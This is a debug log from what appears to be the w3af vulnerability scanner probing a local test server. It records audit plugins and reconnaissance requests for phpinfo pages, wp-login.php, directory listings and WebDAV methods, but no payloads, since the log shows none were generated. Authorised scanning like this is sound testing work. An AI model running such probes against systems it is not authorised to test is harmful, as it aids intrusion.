http://localhost:9090/execute.xml returned HTTP code "404" (id=34,from_cache=0,grep=1,rtt=0.16,did=kdK0Dq4S) [Wed Feb 12 09:36:02 2020 - debug] robots_txt.discover(did="T6jTzgzE",uri="http://localhost:9090/") took 0.46s to run [Wed Feb 12 09:36:02 2020 - debug] shell_shock.audit(did="2v0jCkwm", uri="http://localhost:9090/") [Wed Feb 12 09:36:02 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=36,from_cache=0,grep=1,rtt=0.14,did=MZuFkpo1) [Wed Feb 12 09:36:02 2020 - debug] format_string.audit(did="MQqhp8QS",uri="http://localhost:9090/") took 0.07s to run [Wed Feb 12 09:36:02 2020 - debug] http_in_body.grep(uri="http://localhost:9090/_vti_inf.html") took 0.48s to run [Wed Feb 12 09:36:02 2020 - debug] genexus_xml.discover(did="jbOLulUj",uri="http://localhost:9090/") took 0.67s to run [Wed Feb 12 09:36:02 2020 - debug] memcachei.audit(did="5rVTFwzg", uri="http://localhost:9090/") [Wed Feb 12 09:36:02 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:02 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:5rVTFwzg) [Wed Feb 12 09:36:02 2020 - debug] form_cleartext_password.grep(uri="http://localhost:9090/_vti_inf.html") took 0.54s to run [Wed Feb 12 09:36:02 2020 - debug] http_auth_detect.grep(uri="http://localhost:9090/_vti_inf.html") took 0.41s to run [Wed Feb 12 09:36:02 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] objects.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] error_500.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] meta_tags.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] password_profiling.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] click_jacking.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] lang.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] html_comments.grep(uri="http://localhost:9090/_vti_inf.html") took 0.46s to run [Wed Feb 12 09:36:02 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] form_autocomplete.grep(uri="http://localhost:9090/_vti_inf.html") took 0.46s to run [Wed Feb 12 09:36:02 2020 - debug] strange_reason.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] cache_control.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] strange_headers.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] ssn.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] oracle.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] feeds.grep(uri="http://localhost:9090/_vti_inf.html") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] dir_file_bruter.discover(http://localhost:9090/, did=bCwnp0g9) [Wed Feb 12 09:36:02 2020 - debug] [dir_file_bruter] Crawling "http://localhost:9090/" [Wed Feb 12 09:36:02 2020 - debug] un_ssl.audit(did="QzEwjTZM", uri="http://localhost:9090/") [Wed Feb 12 09:36:02 2020 - debug] un_ssl.audit(did="QzEwjTZM",uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] Will increase timeout to 3.63 seconds after HTTP socket error (did:d5eo6Bef) [Wed Feb 12 09:36:02 2020 - debug] Updating socket timeout for localhost from 3.30 to 3.63 seconds [Wed Feb 12 09:36:02 2020 - debug] Raising HTTP error "INDEX" "http://localhost:9090/" failed reason: "No status line received - the server has closed the connection". Error handling was disabled for this request (did:d5eo6Bef). [Wed Feb 12 09:36:02 2020 - debug] sitemap_xml.discover(http://localhost:9090/, did=zlPzhpCp) [Wed Feb 12 09:36:02 2020 - debug] [sitemap_xml] Crawling "http://localhost:9090/" [Wed Feb 12 09:36:02 2020 - debug] ldapi.audit(did="4o6AKXzt", uri="http://localhost:9090/") [Wed Feb 12 09:36:02 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:02 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:4o6AKXzt) [Wed Feb 12 09:36:02 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=37,from_cache=1,grep=1,rtt=0.03,did=OBvIdLt9) [Wed Feb 12 09:36:02 2020 - debug] wordnet.discover(did="BQboBk2F",uri="http://localhost:9090/") took 0.22s to run [Wed Feb 12 09:36:02 2020 - debug] phpinfo.discover(http://localhost:9090/, did=hz1QZP0K) [Wed Feb 12 09:36:02 2020 - debug] ldapi.audit(did="4o6AKXzt",uri="http://localhost:9090/") took 0.01s to run [Wed Feb 12 09:36:02 2020 - debug] buffer_overflow.audit(did="vd5Q3vHZ", uri="http://localhost:9090/") [Wed Feb 12 09:36:02 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:02 2020 - debug] buffer_overflow.audit(did="vd5Q3vHZ",uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:02 2020 - debug] redos.audit(did="ULXWyogv", uri="http://localhost:9090/") [Wed Feb 12 09:36:02 2020 - debug] global_redirect.audit(did="nCoYmNKF", uri="http://localhost:9090/") [Wed Feb 12 09:36:02 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:02 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:nCoYmNKF) [Wed Feb 12 09:36:02 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:02 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:nCoYmNKF) [Wed Feb 12 09:36:03 2020 - debug] strange_parameters.grep(uri="http://localhost:9090/_vti_inf.html") took 0.18s to run [Wed Feb 12 09:36:03 2020 - debug] symfony.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:03 2020 - debug] file_upload.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:03 2020 - debug] DNS response from DNS server for domain: web.archive.org [Wed Feb 12 09:36:03 2020 - debug] error_pages.grep(uri="http://localhost:9090/_vti_inf.html") took 0.11s to run [Wed Feb 12 09:36:03 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:03 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:03 2020 - debug] url_session.grep(uri="http://localhost:9090/_vti_inf.html") took 0.12s to run [Wed Feb 12 09:36:03 2020 - debug] expect_ct.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:03 2020 - debug] svn_users.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:03 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:03 2020 - debug] private_ip.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:03 2020 - debug] motw.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:03 2020 - debug] meta_generator.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:03 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/_vti_inf.html") took 0.11s to run [Wed Feb 12 09:36:03 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:03 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:03 2020 - debug] redos.audit(did="ULXWyogv",uri="http://localhost:9090/") took 0.04s to run [Wed Feb 12 09:36:03 2020 - debug] Will increase timeout to 3.99 seconds after HTTP socket error (did:6Wa1FbeM) [Wed Feb 12 09:36:03 2020 - debug] Updating socket timeout for localhost from 3.63 to 3.99 seconds [Wed Feb 12 09:36:03 2020 - debug] Raising HTTP error "INVOKE" "http://localhost:9090/" failed reason: "No status line received - the server has closed the connection". Error handling was disabled for this request (did:6Wa1FbeM). [Wed Feb 12 09:36:03 2020 - debug] memcachei.audit(did="5rVTFwzg",uri="http://localhost:9090/") took 0.19s to run [Wed Feb 12 09:36:03 2020 - debug] get_emails.grep(uri="http://localhost:9090/") took 1.04s to run [Wed Feb 12 09:36:03 2020 - debug] [phpinfo] Crawling "http://localhost:9090/" [Wed Feb 12 09:36:03 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 09:36:03 2020 - debug] serialized_object.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:03 2020 - debug] blank_body.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:03 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:03 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:03 2020 - debug] websockets_links.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:03 2020 - debug] csp.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:03 2020 - debug] dom_xss.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:03 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=38,from_cache=0,grep=1,rtt=0.10,did=2v0jCkwm) [Wed Feb 12 09:36:03 2020 - debug] xpath.audit(did="nTz80utf", uri="http://localhost:9090/") [Wed Feb 12 09:36:03 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:03 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:nTz80utf) [Wed Feb 12 09:36:03 2020 - debug] cors_origin.audit(did="j1kOq72o", uri="http://localhost:9090/") [Wed Feb 12 09:36:03 2020 - debug] global_redirect.audit(did="nCoYmNKF",uri="http://localhost:9090/") took 0.10s to run [Wed Feb 12 09:36:03 2020 - debug] credit_cards.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:03 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:03 2020 - debug] keys.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:03 2020 - debug] GET http://localhost:9090/~_w_3_a_f_/ returned HTTP code "404" (id=39,from_cache=0,grep=1,rtt=0.15,did=Mvo6a4Qq) [Wed Feb 12 09:36:03 2020 - debug] htaccess_methods.audit(did="WYc516p5", uri="http://localhost:9090/") [Wed Feb 12 09:36:03 2020 - debug] xpath.audit(did="nTz80utf",uri="http://localhost:9090/") took 0.20s to run [Wed Feb 12 09:36:03 2020 - debug] dav.audit(did="GXOPpO8n", uri="http://localhost:9090/") [Wed Feb 12 09:36:03 2020 - debug] ssi.audit(did="3nJo9S9g", uri="http://localhost:9090/") [Wed Feb 12 09:36:03 2020 - debug] localhost:9090 connection pool stats (free:37 / in_use:6 / max:50 / total:43) [Wed Feb 12 09:36:03 2020 - debug] Connections with more in use time: (941732cff4527333, 0.35 sec) (18f457b2f26810cd, 0.22 sec) (a712a1ad5fc5ab9c, 0.09 sec) (b9c732d80a5bb1dd, 0.01 sec) (d42b919264727ff8, 0.01 sec) [Wed Feb 12 09:36:03 2020 - debug] 0% of GrepWorker workers are idle. [Wed Feb 12 09:36:03 2020 - debug] GrepWorker worker pool internal thread state: (worker: True, task: True, result: True) [Wed Feb 12 09:36:03 2020 - debug] GrepWorker worker pool has 29 tasks in inqueue and 0 tasks in outqueue [Wed Feb 12 09:36:03 2020 - debug] xxe.audit(did="ct94V4Kg", uri="http://localhost:9090/") [Wed Feb 12 09:36:03 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:03 2020 - debug] xxe.audit(did="ct94V4Kg",uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:03 2020 - debug] DNS response from DNS server for domain: www.google.com [Wed Feb 12 09:36:03 2020 - debug] eval.audit(did="DyZCAjlC", uri="http://localhost:9090/") [Wed Feb 12 09:36:03 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:03 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:DyZCAjlC) [Wed Feb 12 09:36:04 2020 - debug] MKCOL http://localhost:9090/ returned HTTP code "404" (id=43,from_cache=0,grep=1,rtt=0.49,did=Br20qfbx) [Wed Feb 12 09:36:04 2020 - debug] GET http://localhost:9090/sitemap.xml returned HTTP code "404" (id=40,from_cache=0,grep=1,rtt=0.11,did=mkDC8mgK) [Wed Feb 12 09:36:04 2020 - debug] http_in_body.grep(uri="http://localhost:9090/.listing") took 0.72s to run [Wed Feb 12 09:36:04 2020 - debug] GET http://localhost:9090/gears_manifest.php returned HTTP code "404" (id=42,from_cache=0,grep=1,rtt=0.07,did=DgWSxo2x) [Wed Feb 12 09:36:04 2020 - debug] form_autocomplete.grep(uri="http://localhost:9090/.listing") took 0.59s to run [Wed Feb 12 09:36:04 2020 - debug] clamav.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:04 2020 - debug] form_cleartext_password.grep(uri="http://localhost:9090/.listing") took 0.76s to run [Wed Feb 12 09:36:04 2020 - debug] GET http://localhost:9090/phpInfo.php returned HTTP code "404" (id=46,from_cache=0,grep=0,rtt=0.26,did=Lcue32xr) [Wed Feb 12 09:36:04 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=45,from_cache=1,grep=1,rtt=0.01,did=2kdlhvps) [Wed Feb 12 09:36:04 2020 - debug] htaccess_methods.audit(did="WYc516p5",uri="http://localhost:9090/") took 0.53s to run [Wed Feb 12 09:36:04 2020 - debug] GET http://localhost:9090/gears_config returned HTTP code "404" (id=41,from_cache=0,grep=1,rtt=0.20,did=GYZ0Pf4A) [Wed Feb 12 09:36:04 2020 - debug] GET http://localhost:9090/xxx.php returned HTTP code "404" (id=44,from_cache=0,grep=0,rtt=0.15,did=RPFTI4S8) [Wed Feb 12 09:36:04 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:04 2020 - debug] localhost:9090 connection pool stats (free:28 / in_use:23 / max:50 / total:51) [Wed Feb 12 09:36:04 2020 - debug] Connections with more in use time: (a712a1ad5fc5ab9c, 0.57 sec) (d42b919264727ff8, 0.50 sec) (5aa0b4376f902084, 0.47 sec) (66eea2c1a1ffd98b, 0.46 sec) (7d7d275c65f0b360, 0.46 sec) [Wed Feb 12 09:36:04 2020 - debug] http_auth_detect.grep(uri="http://localhost:9090/.listing") took 0.12s to run [Wed Feb 12 09:36:04 2020 - debug] 0% of CrawlInfraWorker workers are idle. [Wed Feb 12 09:36:04 2020 - debug] CrawlInfraWorker worker pool internal thread state: (worker: True, task: True, result: True) [Wed Feb 12 09:36:04 2020 - debug] CrawlInfraWorker worker pool has 13 tasks in inqueue and 0 tasks in outqueue [Wed Feb 12 09:36:04 2020 - debug] Worker with ID WorkerThread(j9e6gcyy) is idle. [Wed Feb 12 09:36:04 2020 - debug] Worker with ID WorkerThread(hGEbXfwZ) is idle. [Wed Feb 12 09:36:04 2020 - debug] 6% of WorkerThread workers are idle. [Wed Feb 12 09:36:04 2020 - debug] Worker worker pool internal thread state: (worker: True, task: True, result: True) [Wed Feb 12 09:36:04 2020 - debug] html_comments.grep(uri="http://localhost:9090/.listing") took 0.22s to run [Wed Feb 12 09:36:04 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:04 2020 - debug] DNS response from DNS server for domain: www.bing.com [Wed Feb 12 09:36:04 2020 - debug] GET http://localhost:9090/site-manifest returned HTTP code "404" (id=47,from_cache=0,grep=1,rtt=0.59,did=YKZEZGaK) [Wed Feb 12 09:36:04 2020 - debug] GET http://localhost:9090/admin.php?mode=phpinfo returned HTTP code "404" (id=48,from_cache=0,grep=0,rtt=0.37,did=NuCDWjlT) [Wed Feb 12 09:36:04 2020 - debug] eval.audit(did="DyZCAjlC",uri="http://localhost:9090/") took 0.40s to run [Wed Feb 12 09:36:04 2020 - debug] rosetta_flash.audit(did="X8gdzyUS", uri="http://localhost:9090/") [Wed Feb 12 09:36:04 2020 - debug] rosetta_flash.audit(did="X8gdzyUS",uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:04 2020 - debug] Worker worker pool has 6 tasks in inqueue and 0 tasks in outqueue [Wed Feb 12 09:36:04 2020 - debug] sitemap_xml.discover(did="zlPzhpCp",uri="http://localhost:9090/") took 1.17s to run [Wed Feb 12 09:36:04 2020 - debug] find_dvcs.discover(http://localhost:9090/, did=RKHnLsTM) [Wed Feb 12 09:36:04 2020 - debug] strange_parameters.grep(uri="http://localhost:9090/.listing") took 0.25s to run [Wed Feb 12 09:36:04 2020 - debug] error_500.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:04 2020 - debug] meta_tags.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:04 2020 - debug] password_profiling.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:04 2020 - debug] click_jacking.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:04 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:04 2020 - debug] lang.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:04 2020 - debug] GET http://localhost:9090/phpinfo1.php returned HTTP code "404" (id=50,from_cache=0,grep=0,rtt=0.49,did=OUxNSrTS) [Wed Feb 12 09:36:04 2020 - debug] GET http://localhost:9090/sitemanifest.gears returned HTTP code "404" (id=52,from_cache=0,grep=1,rtt=0.53,did=ytijXcBj) [Wed Feb 12 09:36:04 2020 - debug] url_session.grep(uri="http://localhost:9090/.listing") took 0.28s to run [Wed Feb 12 09:36:04 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:04 2020 - debug] [find_dvcs] Crawling "http://localhost:9090/" [Wed Feb 12 09:36:04 2020 - debug] GET http://localhost:9090/index.php?view=phpinfo returned HTTP code "404" (id=49,from_cache=0,grep=0,rtt=0.44,did=NNDwpmrU) [Wed Feb 12 09:36:04 2020 - debug] GET http://localhost:9090/phpinfo.php returned HTTP code "404" (id=54,from_cache=0,grep=0,rtt=0.49,did=BIU6Sp9n) [Wed Feb 12 09:36:04 2020 - debug] error_pages.grep(uri="http://localhost:9090/.listing") took 0.14s to run [Wed Feb 12 09:36:04 2020 - debug] strange_reason.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:04 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:04 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:04 2020 - debug] cache_control.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:04 2020 - debug] objects.grep(uri="http://localhost:9090/.listing") took 0.34s to run [Wed Feb 12 09:36:04 2020 - debug] GET http://localhost:9090/x.php returned HTTP code "404" (id=53,from_cache=0,grep=0,rtt=0.67,did=NgFRBLsM) [Wed Feb 12 09:36:04 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:04 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:3nJo9S9g) [Wed Feb 12 09:36:04 2020 - debug] Worker with ID AuditorWorker(3lIHqMdP) is idle. [Wed Feb 12 09:36:04 2020 - debug] Worker with ID AuditorWorker(AAwzqj5O) is idle. [Wed Feb 12 09:36:04 2020 - debug] Worker with ID AuditorWorker(OFMDNz5i) is idle. [Wed Feb 12 09:36:04 2020 - debug] Worker with ID AuditorWorker(Rim1zDwH) is idle. [Wed Feb 12 09:36:04 2020 - debug] Worker with ID AuditorWorker(E71iJb08) is idle. [Wed Feb 12 09:36:04 2020 - debug] Worker with ID AuditorWorker(SmdJFVYa) is idle. [Wed Feb 12 09:36:04 2020 - debug] 60% of AuditorWorker workers are idle. [Wed Feb 12 09:36:05 2020 - debug] AuditorWorker worker pool internal thread state: (worker: True, task: True, result: True) [Wed Feb 12 09:36:05 2020 - debug] AuditorWorker worker pool has 0 tasks in inqueue and 0 tasks in outqueue [Wed Feb 12 09:36:05 2020 - debug] xss.audit(did="nLecQCRc", uri="http://localhost:9090/") [Wed Feb 12 09:36:05 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:05 2020 - debug] xss.audit(did="nLecQCRc",uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:05 2020 - debug] GET http://localhost:9090/PHPinfo.php returned HTTP code "404" (id=58,from_cache=0,grep=0,rtt=0.47,did=VFLZSzZH) [Wed Feb 12 09:36:05 2020 - debug] GET http://localhost:9090/phpversion.php returned HTTP code "404" (id=64,from_cache=0,grep=0,rtt=0.47,did=PdRykxlW) [Wed Feb 12 09:36:05 2020 - debug] GET http://localhost:9090/xx.php returned HTTP code "404" (id=65,from_cache=0,grep=0,rtt=0.48,did=eJ3zDw2w) [Wed Feb 12 09:36:06 2020 - debug] GET http://localhost:9090/index.php?mode=phpinfo returned HTTP code "404" (id=66,from_cache=0,grep=0,rtt=0.42,did=rKFtwmSR) [Wed Feb 12 09:36:06 2020 - debug] GET http://localhost:9090/phpVersion.php returned HTTP code "404" (id=69,from_cache=0,grep=0,rtt=0.68,did=PglIA9kg) [Wed Feb 12 09:36:06 2020 - debug] GET http://localhost:9090/gears-config.txt returned HTTP code "404" (id=71,from_cache=0,grep=1,rtt=0.70,did=wI8UzaAN) [Wed Feb 12 09:36:06 2020 - debug] strange_headers.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:06 2020 - debug] ssn.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:06 2020 - debug] oracle.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:06 2020 - debug] feeds.grep(uri="http://localhost:9090/.listing") took 0.00s to run [Wed Feb 12 09:36:06 2020 - debug] GET http://localhost:9090/test1.php returned HTTP code "404" (id=56,from_cache=0,grep=0,rtt=0.43,did=Ehc1nYjT) [Wed Feb 12 09:36:06 2020 - debug] GET http://localhost:9090/test.php?mode=phpinfo returned HTTP code "404" (id=67,from_cache=0,grep=0,rtt=0.72,did=glICirgP) [Wed Feb 12 09:36:06 2020 - debug] GET http://localhost:9090/filesInCache.json returned HTTP code "404" (id=70,from_cache=0,grep=1,rtt=0.75,did=tgmHK4Rb) [Wed Feb 12 09:36:06 2020 - debug] GET http://localhost:9090/info1.php returned HTTP code "404" (id=57,from_cache=0,grep=0,rtt=0.52,did=HPaNxfCF) [Wed Feb 12 09:36:06 2020 - debug] GET http://localhost:9090/INSTALL.php?mode=phpinfo returned HTTP code "404" (id=68,from_cache=0,grep=0,rtt=0.57,did=JmUeBJ9x) [Wed Feb 12 09:36:06 2020 - debug] GET http://localhost:9090/info.php returned HTTP code "404" (id=60,from_cache=0,grep=0,rtt=0.67,did=Pu2YtqZ3) [Wed Feb 12 09:36:06 2020 - debug] ssi.audit(did="3nJo9S9g",uri="http://localhost:9090/") took 1.16s to run [Wed Feb 12 09:36:06 2020 - debug] GET http://localhost:9090/cache_manifest.php returned HTTP code "404" (id=62,from_cache=0,grep=1,rtt=0.78,did=YEBJqj4b) [Wed Feb 12 09:36:07 2020 - debug] GET http://localhost:9090/TEST.php?mode=phpinfo returned HTTP code "404" (id=51,from_cache=0,grep=0,rtt=0.48,did=pn84PBHx) [Wed Feb 12 09:36:07 2020 - debug] xst.audit(did="l59Pqisy", uri="http://localhost:9090/") [Wed Feb 12 09:36:07 2020 - debug] symfony.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:07 2020 - debug] Updating socket timeout for localhost from 3.99 to 4.41 seconds [Wed Feb 12 09:36:07 2020 - debug] GET http://localhost:9090/offline-manifest.json returned HTTP code "404" (id=73,from_cache=0,grep=1,rtt=0.43,did=34QsKrgH) [Wed Feb 12 09:36:07 2020 - debug] GET http://localhost:9090/cache-manifest.gears returned HTTP code "404" (id=72,from_cache=0,grep=1,rtt=0.71,did=RGn5qeGZ) [Wed Feb 12 09:36:07 2020 - debug] file_upload.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:07 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:07 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:07 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/.listing") took 0.11s to run [Wed Feb 12 09:36:07 2020 - debug] expect_ct.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:07 2020 - debug] svn_users.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:07 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:07 2020 - debug] private_ip.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:07 2020 - debug] motw.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:07 2020 - debug] GET http://localhost:9090/gearsconfig returned HTTP code "404" (id=75,from_cache=0,grep=1,rtt=0.16,did=kwXBLQ8s) [Wed Feb 12 09:36:07 2020 - debug] MOVE http://localhost:9090/ returned HTTP code "404" (id=76,from_cache=0,grep=1,rtt=0.15,did=QAB6wY3y) [Wed Feb 12 09:36:07 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=55,from_cache=0,grep=1,rtt=0.45,did=j1kOq72o) [Wed Feb 12 09:36:07 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 6, 'reject-seen-url': 9, 'reject-out-of-scope': 0, 'accept': 10} [Wed Feb 12 09:36:07 2020 - debug] GET http://localhost:9090/install.php?mode=phpinfo returned HTTP code "404" (id=59,from_cache=0,grep=0,rtt=0.56,did=8DaffRyj) [Wed Feb 12 09:36:07 2020 - debug] GET http://localhost:9090/phpInfo1.php returned HTTP code "404" (id=61,from_cache=0,grep=0,rtt=0.71,did=wSaDMqhQ) [Wed Feb 12 09:36:07 2020 - debug] get_emails.grep(uri="http://localhost:9090/_vti_inf.html") took 1.86s to run [Wed Feb 12 09:36:07 2020 - debug] meta_generator.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:07 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=77,from_cache=0,grep=0,rtt=0.16,did=2v0jCkwm) [Wed Feb 12 09:36:07 2020 - debug] ssl_certificate.audit(did="kNLjaJuS", uri="http://localhost:9090/") [Wed Feb 12 09:36:08 2020 - debug] GET http://localhost:9090/PHPversion.php returned HTTP code "404" (id=79,from_cache=0,grep=0,rtt=0.58,did=rRE6VGgE) [Wed Feb 12 09:36:08 2020 - debug] preg_replace.audit(did="5NNQSp9r", uri="http://localhost:9090/") [Wed Feb 12 09:36:08 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:08 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:5NNQSp9r) [Wed Feb 12 09:36:08 2020 - debug] mx_injection.audit(did="pH6dui5G", uri="http://localhost:9090/") [Wed Feb 12 09:36:08 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:08 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:pH6dui5G) [Wed Feb 12 09:36:08 2020 - debug] response_splitting.audit(did="YUs56fc8", uri="http://localhost:9090/") [Wed Feb 12 09:36:08 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:08 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:YUs56fc8) [Wed Feb 12 09:36:08 2020 - debug] GET http://localhost:9090/PHPINFO.php returned HTTP code "404" (id=74,from_cache=0,grep=0,rtt=0.86,did=FEdizShG) [Wed Feb 12 09:36:08 2020 - debug] response_splitting.audit(did="YUs56fc8",uri="http://localhost:9090/") took 0.01s to run [Wed Feb 12 09:36:08 2020 - debug] mx_injection.audit(did="pH6dui5G",uri="http://localhost:9090/") took 0.02s to run [Wed Feb 12 09:36:08 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:08 2020 - debug] 